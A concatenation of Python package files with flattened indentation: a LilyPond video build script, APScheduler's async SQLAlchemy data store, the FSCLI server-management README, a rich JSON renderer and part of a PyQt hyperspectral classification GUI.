audioTrackManager = \
AudioTrackManager(configData.tempAudioDirectoryPath)
for voiceName in relevantVoiceNameSet:
audioTrackManager.generateRawAudio(midiFilePath, voiceName,
configData.shiftOffset)
Logging.trace("<<")
#--------------------
@classmethod
def processRefinedAudio (cls):
"""Generates refined audio files from raw audio file."""
Logging.trace(">>")
configData = cls._configData
audioTrackManager = \
AudioTrackManager(configData.tempAudioDirectoryPath)
relevantVoiceNameSet = (cls._selectedVoiceNameSet
& configData.audioVoiceNameSet)
overriddenVoiceNameSet, voiceNameSet = \
cls._findOverriddenVoiceSets(relevantVoiceNameSet)
for voiceName in voiceNameSet:
Logging.trace("--: processing voice %s", voiceName)
voiceDescriptor = configData.voiceNameToVoiceDataMap[voiceName]
soundVariant = voiceDescriptor.soundVariant
reverbLevel = voiceDescriptor.reverbLevel
audioTrackManager.generateRefinedAudio(voiceName, soundVariant,
reverbLevel)
for voiceName in overriddenVoiceNameSet:
overrideFile = \
configData.voiceNameToOverrideFileNameMap[voiceName]
audioTrackManager.copyOverrideFile(overrideFile, voiceName,
configData.shiftOffset)
Logging.trace("<<")
#--------------------
@classmethod
def processScore (cls):
"""Generates score as PDF and moves them to local target
directory."""
Logging.trace(">>")
cls._makePdf("score",
cls._configData.fileNamePrefix + "_score",
cls._configData.scoreVoiceNameList)
Logging.trace("<<")
#--------------------
@classmethod
def processSilentVideo (cls):
"""Generates video without audio from lilypond file."""
Logging.trace(">>")
mmPerInch = 25.4
configData = cls._configData
intermediateFilesAreKept = configData.intermediateFilesAreKept
intermediateFileDirectoryPath = \
configData.intermediateFileDirectoryPath
targetDirectoryPath = configData.targetDirectoryPath
targetSubtitleFileName = (targetDirectoryPath
+ cls._pathSeparator
+ (subtitleFileNameTemplate
% configData.fileNamePrefix))
tempLilypondFilePath = cls._adaptTempFileName("silentvideo", [])
for _, videoFileKind in configData.videoFileKindMap.items():
message = ("== generating silent video for %s"
% videoFileKind.name)
OperatingSystem.showMessageOnConsole(message)
videoTargetName = videoFileKind.target
if videoTargetName not in configData.videoTargetMap:
Logging.trace("--: unknown video target %s for file kind %s",
videoTargetName, videoFileKind.name)
else:
videoTarget = configData.videoTargetMap[videoTargetName]
effectiveVideoResolution = (videoTarget.resolution
* videoTarget.scalingFactor)
factor = mmPerInch / videoTarget.resolution
videoWidth = videoTarget.width * factor
videoHeight = videoTarget.height * factor
videoLineWidth = videoWidth - 2 * videoTarget.leftRightMargin
lilypondFile = LilypondFile(tempLilypondFilePath)
lilypondFile.setVideoParameters(videoTarget.name,
effectiveVideoResolution,
videoTarget.systemSize,
videoTarget.topBottomMargin,
videoWidth, videoHeight,
videoLineWidth)
lilypondFile.generate(configData.includeFilePath,
configData.lilypondVersion, "video",
videoFileKind.voiceNameList,
configData.title,
configData.songComposerText,
configData.voiceNameToChordsMap,
configData.voiceNameToLyricsMap,
configData.voiceNameToScoreNameMap,
configData.measureToTempoMap,
configData.phaseAndVoiceNameToClefMap,
configData.phaseAndVoiceNameToStaffListMap)
targetMp4FileName = (targetDirectoryPath
+ cls._pathSeparator
+ (silentVideoFileNameTemplate
% (configData.fileNamePrefix,
videoFileKind.fileNameSuffix)))
videoGenerator = \
LilypondPngVideoGenerator(tempLilypondFilePath,
targetMp4FileName,
targetSubtitleFileName,
configData.measureToTempoMap,
configData.countInMeasureCount,
videoTarget.frameRate,
videoTarget.scalingFactor,
videoTarget.ffmpegPresetName,
intermediateFileDirectoryPath,
intermediateFilesAreKept)
videoGenerator.process()
videoGenerator.cleanup()
##OperatingSystem.moveFile(targetMp4FileName,
## configData.targetDirectoryPath)
##OperatingSystem.moveFile(targetSubtitleFileName,
## configData.targetDirectoryPath)
OperatingSystem.removeFile(tempLilypondFilePath,
intermediateFilesAreKept)
Logging.trace("<<")
#--------------------
#--------------------
def conditionalExecuteHandlerProc (processingPhase : String,
processingPhaseSet : StringSet,
isPreprocessing : Boolean,
handlerProc : Callable):
"""Checks whether <processingPhase> occurs in <processingPhaseSet>, for
being part of the group pre- or postprocessing (depending on
<isPreprocessing>) and executes <handlerProc> when processing
phase matches"""
Logging.trace(">>: processingPhase = %r, processingPhaseSet = %r,"
+ " isPreprocessing = %r",
processingPhase, processingPhaseSet, isPreprocessing)
allowedPhaseSet = set([ "all", processingPhase,
iif(isPreprocessing, "preprocess", "postprocess")])
if len(allowedPhaseSet.intersection(processingPhaseSet)) > 0:
handlerProc()
Logging.trace("<<")
#--------------------
def initialize ():
"""Initializes LTBVC program."""
Logging.trace(">>")
intermediateFilesAreKept, processingPhaseSet, \
selectedVoiceNameSet, argumentList = _CommandLineOptions.read()
_CommandLineOptions.checkArguments(argumentList)
# set logging file path from command line (if available)
loggingFilePath = argumentList.loggingFilePath
if loggingFilePath is not None:
if loggingFilePath.lower() != lowerCasedNullLoggingFileName:
Logging.setFileName(loggingFilePath, False)
else:
Logging.setEnabled(False)
configData = LTBVC_ConfigurationData()
_LilypondProcessor._configData = configData
_LilypondProcessor._selectedVoiceNameSet = selectedVoiceNameSet
configurationFilePath = argumentList.configurationFilePath
configurationFile = configData.readFile(configurationFilePath)
if configurationFile is None:
Logging.trace("--: cannot process configuration file %r",
configurationFilePath)
isOkay = False
else:
isOkay = True
if loggingFilePath is None:
# get path from configuration file
loggingFilePath = configData.get("loggingFilePath")
if loggingFilePath is None:
Logging.setEnabled(False)
else:
Logging.setFileName(loggingFilePath, True)
configData.checkAndSetDerivedVariables(selectedVoiceNameSet)
# override config file setting from command line option
if intermediateFilesAreKept:
SETATTR(configData, "intermediateFilesAreKept", True)
# initialize all the submodules with configuration information
_LilypondProcessor._lilypondCommand = configData.lilypondCommand
LilypondPngVideoGenerator.initialize(configData.ffmpegCommand,
configData.lilypondCommand)
VideoAudioCombiner.initialize(configData.ffmpegCommand,
configData.mp4boxCommand)
AudioTrackManager.initialize(configData.aacCommandLine,
configData.audioProcessorMap,
configData.ffmpegCommand,
configData.midiToWavRenderingCommandLine,
configData.soundStyleNameToTextMap,
configData.intermediateFilesAreKept,
configData.intermediateFileDirectoryPath)
MidiTransformer.initialize(configData.voiceNameToVariationFactorMap,
configData.humanizationStyleNameToTextMap,
configData.humanizedVoiceNameSet)
Logging.trace("<<: isOkay = %r, processingPhaseSet = %r",
isOkay, processingPhaseSet)
return isOkay, processingPhaseSet
#--------------------
def main ():
"""Main program for LTBVC."""
Logging.initialize()
Logging.setLevel(Logging.Level_verbose)
Logging.setTracingWithTime(True, 2)
Logging.trace(">>")
isOkay, processingPhaseSet = initialize()
if isOkay:
Logging.trace("--: processingPhaseSet = %r", processingPhaseSet)
actionList = \
(("extract", True, _LilypondProcessor.processExtract),
("score", True, _LilypondProcessor.processScore),
("midi", True, _LilypondProcessor.processMidi),
("silentvideo", True, _LilypondProcessor.processSilentVideo),
("rawaudio", False, _LilypondProcessor.processRawAudio),
("refinedaudio", False, _LilypondProcessor.processRefinedAudio),
("mix", False, _LilypondProcessor.processMix),
("finalvideo", False, _LilypondProcessor.processFinalVideo))
for processingPhase, isPreprocessing, handlerProc in actionList:
conditionalExecuteHandlerProc(processingPhase, processingPhaseSet,
isPreprocessing, handlerProc)
Logging.trace("<<")
#--------------------
if __name__ == "__main__":
main() | PypiClean |
/APScheduler-4.0.0a1.tar.gz/APScheduler-4.0.0a1/src/apscheduler/datastores/async_sqlalchemy.py | from __future__ import annotations
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Any, Iterable
from uuid import UUID
import anyio
import attrs
import sniffio
import tenacity
from sqlalchemy import and_, bindparam, or_, select
from sqlalchemy.engine import URL, Result
from sqlalchemy.exc import IntegrityError, InterfaceError
from sqlalchemy.ext.asyncio import create_async_engine
from sqlalchemy.ext.asyncio.engine import AsyncEngine
from sqlalchemy.sql.ddl import DropTable
from sqlalchemy.sql.elements import BindParameter
from .._enums import ConflictPolicy
from .._events import (
DataStoreEvent,
JobAcquired,
JobAdded,
JobDeserializationFailed,
ScheduleAdded,
ScheduleDeserializationFailed,
ScheduleRemoved,
ScheduleUpdated,
TaskAdded,
TaskRemoved,
TaskUpdated,
)
from .._exceptions import ConflictingIdError, SerializationError, TaskLookupError
from .._structures import Job, JobResult, Schedule, Task
from ..abc import AsyncEventBroker
from ..marshalling import callable_to_ref
from .base import BaseAsyncDataStore
from .sqlalchemy import _BaseSQLAlchemyDataStore
@attrs.define(eq=False)
class AsyncSQLAlchemyDataStore(_BaseSQLAlchemyDataStore, BaseAsyncDataStore):
"""
Uses a relational database to store data.
When started, this data store creates the appropriate tables on the given database
if they're not already present.
Operations are retried (in accordance to ``retry_settings``) when an operation
raises :exc:`sqlalchemy.OperationalError`.
This store has been tested to work with PostgreSQL (asyncpg driver) and MySQL
(asyncmy driver).
:param engine: an asynchronous SQLAlchemy engine
:param schema: a database schema name to use, if not the default
:param serializer: the serializer used to (de)serialize tasks, schedules and jobs
for storage
:param lock_expiration_delay: maximum amount of time (in seconds) that a scheduler
or worker can keep a lock on a schedule or task
:param retry_settings: Tenacity settings for retrying operations in case of a
database connecitivty problem
:param start_from_scratch: erase all existing data during startup (useful for test
suites)
"""
engine: AsyncEngine
@classmethod
def from_url(cls, url: str | URL, **options) -> AsyncSQLAlchemyDataStore:
"""
Create a new asynchronous SQLAlchemy data store.
:param url: an SQLAlchemy URL to pass to :func:`~sqlalchemy.create_engine`
(must use an async dialect like ``asyncpg`` or ``asyncmy``)
:param kwargs: keyword arguments to pass to the initializer of this class
:return: the newly created data store
"""
engine = create_async_engine(url, future=True)
return cls(engine, **options)
def _retry(self) -> tenacity.AsyncRetrying:
# OSError is raised by asyncpg if it can't connect
return tenacity.AsyncRetrying(
stop=self.retry_settings.stop,
wait=self.retry_settings.wait,
retry=tenacity.retry_if_exception_type((InterfaceError, OSError)),
after=self._after_attempt,
sleep=anyio.sleep,
reraise=True,
)
async def start(self, event_broker: AsyncEventBroker) -> None:
await super().start(event_broker)
asynclib = sniffio.current_async_library() or "(unknown)"
if asynclib != "asyncio":
raise RuntimeError(
f"This data store requires asyncio; currently running: {asynclib}"
)
# Verify that the schema is in place
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
if self.start_from_scratch:
for table in self._metadata.sorted_tables:
await conn.execute(DropTable(table, if_exists=True))
await conn.run_sync(self._metadata.create_all)
query = select(self.t_metadata.c.schema_version)
result = await conn.execute(query)
version = result.scalar()
if version is None:
await conn.execute(
self.t_metadata.insert(values={"schema_version": 1})
)
elif version > 1:
raise RuntimeError(
f"Unexpected schema version ({version}); "
f"only version 1 is supported by this version of "
f"APScheduler"
)
async def _deserialize_schedules(self, result: Result) -> list[Schedule]:
schedules: list[Schedule] = []
for row in result:
try:
schedules.append(Schedule.unmarshal(self.serializer, row._asdict()))
except SerializationError as exc:
await self._events.publish(
ScheduleDeserializationFailed(schedule_id=row["id"], exception=exc)
)
return schedules
async def _deserialize_jobs(self, result: Result) -> list[Job]:
jobs: list[Job] = []
for row in result:
try:
jobs.append(Job.unmarshal(self.serializer, row._asdict()))
except SerializationError as exc:
await self._events.publish(
JobDeserializationFailed(job_id=row["id"], exception=exc)
)
return jobs
async def add_task(self, task: Task) -> None:
insert = self.t_tasks.insert().values(
id=task.id,
func=callable_to_ref(task.func),
max_running_jobs=task.max_running_jobs,
misfire_grace_time=task.misfire_grace_time,
)
try:
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
await conn.execute(insert)
except IntegrityError:
update = (
self.t_tasks.update()
.values(
func=callable_to_ref(task.func),
max_running_jobs=task.max_running_jobs,
misfire_grace_time=task.misfire_grace_time,
)
.where(self.t_tasks.c.id == task.id)
)
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
await conn.execute(update)
await self._events.publish(TaskUpdated(task_id=task.id))
else:
await self._events.publish(TaskAdded(task_id=task.id))
async def remove_task(self, task_id: str) -> None:
delete = self.t_tasks.delete().where(self.t_tasks.c.id == task_id)
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
result = await conn.execute(delete)
if result.rowcount == 0:
raise TaskLookupError(task_id)
else:
await self._events.publish(TaskRemoved(task_id=task_id))
async def get_task(self, task_id: str) -> Task:
query = select(
[
self.t_tasks.c.id,
self.t_tasks.c.func,
self.t_tasks.c.max_running_jobs,
self.t_tasks.c.state,
self.t_tasks.c.misfire_grace_time,
]
).where(self.t_tasks.c.id == task_id)
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
result = await conn.execute(query)
row = result.first()
if row:
return Task.unmarshal(self.serializer, row._asdict())
else:
raise TaskLookupError(task_id)
async def get_tasks(self) -> list[Task]:
query = select(
[
self.t_tasks.c.id,
self.t_tasks.c.func,
self.t_tasks.c.max_running_jobs,
self.t_tasks.c.state,
self.t_tasks.c.misfire_grace_time,
]
).order_by(self.t_tasks.c.id)
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
result = await conn.execute(query)
tasks = [
Task.unmarshal(self.serializer, row._asdict()) for row in result
]
return tasks
async def add_schedule(
self, schedule: Schedule, conflict_policy: ConflictPolicy
) -> None:
event: DataStoreEvent
values = schedule.marshal(self.serializer)
insert = self.t_schedules.insert().values(**values)
try:
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
await conn.execute(insert)
except IntegrityError:
if conflict_policy is ConflictPolicy.exception:
raise ConflictingIdError(schedule.id) from None
elif conflict_policy is ConflictPolicy.replace:
del values["id"]
update = (
self.t_schedules.update()
.where(self.t_schedules.c.id == schedule.id)
.values(**values)
)
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
await conn.execute(update)
event = ScheduleUpdated(
schedule_id=schedule.id, next_fire_time=schedule.next_fire_time
)
await self._events.publish(event)
else:
event = ScheduleAdded(
schedule_id=schedule.id, next_fire_time=schedule.next_fire_time
)
await self._events.publish(event)
async def remove_schedules(self, ids: Iterable[str]) -> None:
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
delete = self.t_schedules.delete().where(
self.t_schedules.c.id.in_(ids)
)
if self._supports_update_returning:
delete = delete.returning(self.t_schedules.c.id)
removed_ids: Iterable[str] = [
row[0] for row in await conn.execute(delete)
]
else:
# TODO: actually check which rows were deleted?
await conn.execute(delete)
removed_ids = ids
for schedule_id in removed_ids:
await self._events.publish(ScheduleRemoved(schedule_id=schedule_id))
async def get_schedules(self, ids: set[str] | None = None) -> list[Schedule]:
query = self.t_schedules.select().order_by(self.t_schedules.c.id)
if ids:
query = query.where(self.t_schedules.c.id.in_(ids))
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
result = await conn.execute(query)
return await self._deserialize_schedules(result)
async def acquire_schedules(self, scheduler_id: str, limit: int) -> list[Schedule]:
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
now = datetime.now(timezone.utc)
acquired_until = now + timedelta(seconds=self.lock_expiration_delay)
schedules_cte = (
select(self.t_schedules.c.id)
.where(
and_(
self.t_schedules.c.next_fire_time.isnot(None),
self.t_schedules.c.next_fire_time <= now,
or_(
self.t_schedules.c.acquired_until.is_(None),
self.t_schedules.c.acquired_until < now,
),
)
)
.order_by(self.t_schedules.c.next_fire_time)
.limit(limit)
.with_for_update(skip_locked=True)
.cte()
)
subselect = select([schedules_cte.c.id])
update = (
self.t_schedules.update()
.where(self.t_schedules.c.id.in_(subselect))
.values(acquired_by=scheduler_id, acquired_until=acquired_until)
)
if self._supports_update_returning:
update = update.returning(*self.t_schedules.columns)
result = await conn.execute(update)
else:
await conn.execute(update)
query = self.t_schedules.select().where(
and_(self.t_schedules.c.acquired_by == scheduler_id)
)
result = await conn.execute(query)
schedules = await self._deserialize_schedules(result)
return schedules
async def release_schedules(
self, scheduler_id: str, schedules: list[Schedule]
) -> None:
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
update_events: list[ScheduleUpdated] = []
finished_schedule_ids: list[str] = []
update_args: list[dict[str, Any]] = []
for schedule in schedules:
if schedule.next_fire_time is not None:
try:
serialized_trigger = self.serializer.serialize(
schedule.trigger
)
except SerializationError:
self._logger.exception(
"Error serializing trigger for schedule %r – "
"removing from data store",
schedule.id,
)
finished_schedule_ids.append(schedule.id)
continue
update_args.append(
{
"p_id": schedule.id,
"p_trigger": serialized_trigger,
"p_next_fire_time": schedule.next_fire_time,
}
)
else:
finished_schedule_ids.append(schedule.id)
# Update schedules that have a next fire time
if update_args:
p_id: BindParameter = bindparam("p_id")
p_trigger: BindParameter = bindparam("p_trigger")
p_next_fire_time: BindParameter = bindparam("p_next_fire_time")
update = (
self.t_schedules.update()
.where(
and_(
self.t_schedules.c.id == p_id,
self.t_schedules.c.acquired_by == scheduler_id,
)
)
.values(
trigger=p_trigger,
next_fire_time=p_next_fire_time,
acquired_by=None,
acquired_until=None,
)
)
next_fire_times = {
arg["p_id"]: arg["p_next_fire_time"] for arg in update_args
}
# TODO: actually check which rows were updated?
await conn.execute(update, update_args)
updated_ids = list(next_fire_times)
for schedule_id in updated_ids:
event = ScheduleUpdated(
schedule_id=schedule_id,
next_fire_time=next_fire_times[schedule_id],
)
update_events.append(event)
# Remove schedules that have no next fire time or failed to
# serialize
if finished_schedule_ids:
delete = self.t_schedules.delete().where(
self.t_schedules.c.id.in_(finished_schedule_ids)
)
await conn.execute(delete)
for event in update_events:
await self._events.publish(event)
for schedule_id in finished_schedule_ids:
await self._events.publish(ScheduleRemoved(schedule_id=schedule_id))
async def get_next_schedule_run_time(self) -> datetime | None:
statenent = (
select(self.t_schedules.c.next_fire_time)
.where(self.t_schedules.c.next_fire_time.isnot(None))
.order_by(self.t_schedules.c.next_fire_time)
.limit(1)
)
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
result = await conn.execute(statenent)
return result.scalar()
async def add_job(self, job: Job) -> None:
marshalled = job.marshal(self.serializer)
insert = self.t_jobs.insert().values(**marshalled)
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
await conn.execute(insert)
event = JobAdded(
job_id=job.id,
task_id=job.task_id,
schedule_id=job.schedule_id,
tags=job.tags,
)
await self._events.publish(event)
async def get_jobs(self, ids: Iterable[UUID] | None = None) -> list[Job]:
query = self.t_jobs.select().order_by(self.t_jobs.c.id)
if ids:
job_ids = [job_id for job_id in ids]
query = query.where(self.t_jobs.c.id.in_(job_ids))
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
result = await conn.execute(query)
return await self._deserialize_jobs(result)
async def acquire_jobs(self, worker_id: str, limit: int | None = None) -> list[Job]:
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
now = datetime.now(timezone.utc)
acquired_until = now + timedelta(seconds=self.lock_expiration_delay)
query = (
self.t_jobs.select()
.join(self.t_tasks, self.t_tasks.c.id == self.t_jobs.c.task_id)
.where(
or_(
self.t_jobs.c.acquired_until.is_(None),
self.t_jobs.c.acquired_until < now,
)
)
.order_by(self.t_jobs.c.created_at)
.with_for_update(skip_locked=True)
.limit(limit)
)
result = await conn.execute(query)
if not result:
return []
# Mark the jobs as acquired by this worker
jobs = await self._deserialize_jobs(result)
task_ids: set[str] = {job.task_id for job in jobs}
# Retrieve the limits
query = select(
[
self.t_tasks.c.id,
self.t_tasks.c.max_running_jobs
- self.t_tasks.c.running_jobs,
]
).where(
self.t_tasks.c.max_running_jobs.isnot(None),
self.t_tasks.c.id.in_(task_ids),
)
result = await conn.execute(query)
job_slots_left: dict[str, int] = dict(result.fetchall())
# Filter out jobs that don't have free slots
acquired_jobs: list[Job] = []
increments: dict[str, int] = defaultdict(lambda: 0)
for job in jobs:
# Don't acquire the job if there are no free slots left
slots_left = job_slots_left.get(job.task_id)
if slots_left == 0:
continue
elif slots_left is not None:
job_slots_left[job.task_id] -= 1
acquired_jobs.append(job)
increments[job.task_id] += 1
if acquired_jobs:
# Mark the acquired jobs as acquired by this worker
acquired_job_ids = [job.id for job in acquired_jobs]
update = (
self.t_jobs.update()
.values(
acquired_by=worker_id, acquired_until=acquired_until
)
.where(self.t_jobs.c.id.in_(acquired_job_ids))
)
await conn.execute(update)
# Increment the running job counters on each task
p_id: BindParameter = bindparam("p_id")
p_increment: BindParameter = bindparam("p_increment")
params = [
{"p_id": task_id, "p_increment": increment}
for task_id, increment in increments.items()
]
update = (
self.t_tasks.update()
.values(
running_jobs=self.t_tasks.c.running_jobs + p_increment
)
.where(self.t_tasks.c.id == p_id)
)
await conn.execute(update, params)
# Publish the appropriate events
for job in acquired_jobs:
await self._events.publish(JobAcquired(job_id=job.id, worker_id=worker_id))
return acquired_jobs
async def release_job(
self, worker_id: str, task_id: str, result: JobResult
) -> None:
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
# Record the job result
if result.expires_at > result.finished_at:
marshalled = result.marshal(self.serializer)
insert = self.t_job_results.insert().values(**marshalled)
await conn.execute(insert)
# Decrement the number of running jobs for this task
update = (
self.t_tasks.update()
.values(running_jobs=self.t_tasks.c.running_jobs - 1)
.where(self.t_tasks.c.id == task_id)
)
await conn.execute(update)
# Delete the job
delete = self.t_jobs.delete().where(
self.t_jobs.c.id == result.job_id
)
await conn.execute(delete)
async def get_job_result(self, job_id: UUID) -> JobResult | None:
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
# Retrieve the result
query = self.t_job_results.select().where(
self.t_job_results.c.job_id == job_id
)
row = (await conn.execute(query)).first()
# Delete the result
delete = self.t_job_results.delete().where(
self.t_job_results.c.job_id == job_id
)
await conn.execute(delete)
return (
JobResult.unmarshal(self.serializer, row._asdict())
if row
else None
) | PypiClean |
/FSCLI-3.0.0.tar.gz/FSCLI-3.0.0/README.md | # FSCLI
### Thank you for visiting! 
FSCLI is a module that simplifies starting, stopping & deleting servers based on server_id and email.
## Installation
### Using `pip3`
You can install the FSCLI package using `pip3`. If there are any errors or issues with `pip3`, then you can install it using Git(down below).
```shell
~$ pip3 install --upgrade fscli
```
## Usages
These are different commands that you can run, replace the word inside the <> with the replacement value.
```shell
~$ python3 -m fscli --start --email <email> --server_id <server id>
~$ python3 -m fscli --stop_all --email <email>
~$ python3 -m fscli --stop --email <email> --server_id <server id>
~$ python3 -m fscli --destroy_all --email <email>
~$ python3 -m fscli --destroy --email <email> --server_id <server_id>
~$ python3 -m fscli --fraud_set --email <email>
```
## Installation From Source
### Cloning the Repository
If you are installing from source, be sure to have `git` installed on your machine.
```shell
~$ git clone https://github.com/fluidstackio/fscli.git
```
### Installing the packages
You can use `pip3` to install the packages required to run the package.
```shell
~$ cd FSCLI && sudo pip3 install -r requirements.txt
```
| PypiClean |
/Ngoto-0.0.39-py3-none-any.whl/ngoto/core/util/rich/json.py | from pathlib import Path
from json import loads, dumps
from typing import Any, Callable, Optional, Union
from .text import Text
from .highlighter import JSONHighlighter, NullHighlighter
class JSON:
"""A renderable which pretty prints JSON.
Args:
json (str): JSON encoded data.
indent (Union[None, int, str], optional): Number of characters to indent by. Defaults to 2.
highlight (bool, optional): Enable highlighting. Defaults to True.
skip_keys (bool, optional): Skip keys not of a basic type. Defaults to False.
ensure_ascii (bool, optional): Escape all non-ascii characters. Defaults to False.
check_circular (bool, optional): Check for circular references. Defaults to True.
allow_nan (bool, optional): Allow NaN and Infinity values. Defaults to True.
default (Callable, optional): A callable that converts values that can not be encoded
in to something that can be JSON encoded. Defaults to None.
sort_keys (bool, optional): Sort dictionary keys. Defaults to False.
"""
def __init__(
self,
json: str,
indent: Union[None, int, str] = 2,
highlight: bool = True,
skip_keys: bool = False,
ensure_ascii: bool = False,
check_circular: bool = True,
allow_nan: bool = True,
default: Optional[Callable[[Any], Any]] = None,
sort_keys: bool = False,
) -> None:
data = loads(json)
json = dumps(
data,
indent=indent,
skipkeys=skip_keys,
ensure_ascii=ensure_ascii,
check_circular=check_circular,
allow_nan=allow_nan,
default=default,
sort_keys=sort_keys,
)
highlighter = JSONHighlighter() if highlight else NullHighlighter()
self.text = highlighter(json)
self.text.no_wrap = True
self.text.overflow = None
@classmethod
def from_data(
cls,
data: Any,
indent: Union[None, int, str] = 2,
highlight: bool = True,
skip_keys: bool = False,
ensure_ascii: bool = False,
check_circular: bool = True,
allow_nan: bool = True,
default: Optional[Callable[[Any], Any]] = None,
sort_keys: bool = False,
) -> "JSON":
"""Encodes a JSON object from arbitrary data.
Args:
data (Any): An object that may be encoded in to JSON
indent (Union[None, int, str], optional): Number of characters to indent by. Defaults to 2.
highlight (bool, optional): Enable highlighting. Defaults to True.
default (Callable, optional): Optional callable which will be called for objects that cannot be serialized. Defaults to None.
skip_keys (bool, optional): Skip keys not of a basic type. Defaults to False.
ensure_ascii (bool, optional): Escape all non-ascii characters. Defaults to False.
check_circular (bool, optional): Check for circular references. Defaults to True.
allow_nan (bool, optional): Allow NaN and Infinity values. Defaults to True.
default (Callable, optional): A callable that converts values that can not be encoded
in to something that can be JSON encoded. Defaults to None.
sort_keys (bool, optional): Sort dictionary keys. Defaults to False.
Returns:
JSON: New JSON object from the given data.
"""
json_instance: "JSON" = cls.__new__(cls)
json = dumps(
data,
indent=indent,
skipkeys=skip_keys,
ensure_ascii=ensure_ascii,
check_circular=check_circular,
allow_nan=allow_nan,
default=default,
sort_keys=sort_keys,
)
highlighter = JSONHighlighter() if highlight else NullHighlighter()
json_instance.text = highlighter(json)
json_instance.text.no_wrap = True
json_instance.text.overflow = None
return json_instance
def __rich__(self) -> Text:
return self.text
if __name__ == "__main__":
import argparse
import sys
parser = argparse.ArgumentParser(description="Pretty print json")
parser.add_argument(
"path",
metavar="PATH",
help="path to file, or - for stdin",
)
parser.add_argument(
"-i",
"--indent",
metavar="SPACES",
type=int,
help="Number of spaces in an indent",
default=2,
)
args = parser.parse_args()
from ngoto.core.util.rich.console import Console
console = Console()
error_console = Console(stderr=True)
try:
if args.path == "-":
json_data = sys.stdin.read()
else:
json_data = Path(args.path).read_text()
except Exception as error:
error_console.print(f"Unable to read {args.path!r}; {error}")
sys.exit(-1)
console.print(JSON(json_data, indent=args.indent), soft_wrap=True) | PypiClean |
/HySpec-0.1.4.4.tar.gz/HySpec-0.1.4.4/spectralAdv/classificationViewer.py | from .specTools import *
from os import listdir
from os import remove
from os import path
from os.path import join
from sys import argv
from sys import exit
import csv
import shapefile
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from . import classificationResultsViewer
from . import classification
from . import specTools
class progressBar(QDialog):
def __init__(self, title=None, text=None, parent=None):
super(progressBar, self).__init__(parent)
self.setGeometry(150, 150, 200, 100)
self.setWindowTitle(title)
# add label and progress bar
self.text = QLabel()
self.text.setText(text)
self.progress = QProgressBar(self)
# set the layout
vbox = QVBoxLayout()
vbox.addWidget(self.text)
vbox.addWidget(self.progress)
self.setLayout(vbox)
#show it
self.show()
class classAnalysisGUI(QMainWindow):
def __init__(self, settings=None, imageDir="", parent=None):
super(classAnalysisGUI, self).__init__(parent)
self.setWindowTitle("Class Analysis")
self.setWindowIcon(QIcon('files_icon.ico'))
self.setGeometry(150, 150, 500, 800)
self.settings = settings
self.imageDir = imageDir
self.ROIdata = {}
self.wl = []
self.learners = {}
self.validation = {}
quitAction = QAction("Quit",self)
quitAction.setShortcut("Ctrl+Q")
quitAction.triggered.connect(self.cancel)
openROIAction = QAction("Open ROI csv file",self)
openROIAction.setShortcut("Ctrl+O")
openROIAction.triggered.connect(self.choose_ROI_file)
plotSelectedMeansAction = QAction("Plot Selected Class Means",self)
plotSelectedMeansAction.triggered.connect(self.plot_selected_means)
plotMeansAction = QAction("Plot All Class Means",self)
plotMeansAction.triggered.connect(self.plot_all_means)
classifyImageAction = QAction("Apply Classifier to an Image",self)
classifyImageAction.triggered.connect(self.classify_image)
# GUI Widgets
self.ROIfileText = QLabel()
self.ROIfileText.setText("No ROI file selected")
# list widget with table of ROIs
self.table_view = QTableWidget()
self.table_view.setSelectionBehavior(QAbstractItemView.SelectRows)
self.table_view.setRowCount(0)
self.table_view.setColumnCount(4)
self.table_view.setHorizontalHeaderLabels(['Name','Color','Num Points'])
self.table_view.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
self.table_view.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)
self.table_view.horizontalHeader().setSectionResizeMode(2, QHeaderView.ResizeToContents)
self.table_view.setColumnWidth(3, 75) # ROI data
self.table_view.setColumnHidden(3, True)
self.table_view.verticalHeader().setAlternatingRowColors(True)
# add a horizontal seperator line
line1 = QFrame()
line1.setFrameShape(QFrame.HLine)
line1.setFrameShadow(QFrame.Sunken)
self.SelectAllMethodsCheckBox = QCheckBox('Select All Methods and Plots', self)
self.SelectAllMethodsCheckBox.stateChanged.connect(self.SelectAllMethodsCheckBoxChanged)
# add a horizontal seperator line
line2 = QFrame()
line2.setFrameShape(QFrame.HLine)
line2.setFrameShadow(QFrame.Sunken)
self.ClassMethodsSectionText = QLabel()
self.ClassMethodsSectionText.setText("Select Calssification Methods:")
self.LDAclassificationCheckBox = QCheckBox('Linear Discriminant Analysis', self)
self.QDAclassificationCheckBox = QCheckBox('Quadratic Discriminant Analysis', self)
self.RFclassificationCheckBox = QCheckBox('Random Forest', self)
self.DTclassificationCheckBox = QCheckBox('Decision Tree', self)
self.ScatterplotMethodsSectionText = QLabel()
self.ScatterplotMethodsSectionText.setText("Select Scatterplot Methods:")
self.ScatterplotPCACheckBox = QCheckBox('PCA Dimension Reduction Scatterplot', self)
self.ScatterplotLDACheckBox = QCheckBox('LDA Dimension Reduction Scatterplot', self)
# add a horizontal seperator line
line3 = QFrame()
line3.setFrameShape(QFrame.HLine)
line3.setFrameShadow(QFrame.Sunken)
# OK and Cancel buttons
self.btn_analysis = QPushButton("Run Analysis")
self.btn_analysis.clicked.connect(self.full_analysis)
# Layout
self.widget_central = QWidget()
self.vbox = QVBoxLayout()
self.widget_central.setLayout(self.vbox)
